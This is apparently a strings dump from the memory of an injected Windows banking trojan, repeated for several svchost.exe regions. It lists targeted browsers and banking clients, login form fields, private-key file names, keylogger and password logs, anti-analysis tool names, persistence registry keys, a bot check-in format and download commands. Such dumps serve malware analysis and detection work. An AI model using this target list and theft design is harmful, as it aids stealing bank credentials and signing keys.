\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1100_rwx_032C0000_0006A000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;.
SSSh0 .
SSShpk.
SSShpF.
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
SYSTEM!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1144_rwx_00820000_0005B000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1144_rwx_008C0000_0006A000:




.text
`.rdata
@.data
.reloc
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
%s\%s
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
dbghelp.dll
MSVCRT.dll
PSAPI.DLL
NETAPI32.dll
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
RegDeleteKeyA
ADVAPI32.dll
?456789:;<=
!"#$%&'()* ,-./0123
;3 #>6.&
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
.Prev
.current
NETWORKSERVICE!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
?"?(?-?~?
;-;5;=;^;|;
7"7)7\7~7
6 6$6(6,6064686
mavast.com
ya.ru
serverkey.dat
\windows\

svchost.exe_1184_rwx_00C30000_0005B000:




.text
`.data
.reloc
`.rdata
@.data
<>http
PSShL
SSShp
tUSSSh
SSShp;
SSSh0 
SSShpk
SSShpF
t9SSSh
u1SSShP
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
C:\iDEFENSE
\\.\NPF_NdisWanIp
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.4.10
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
/search.php
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
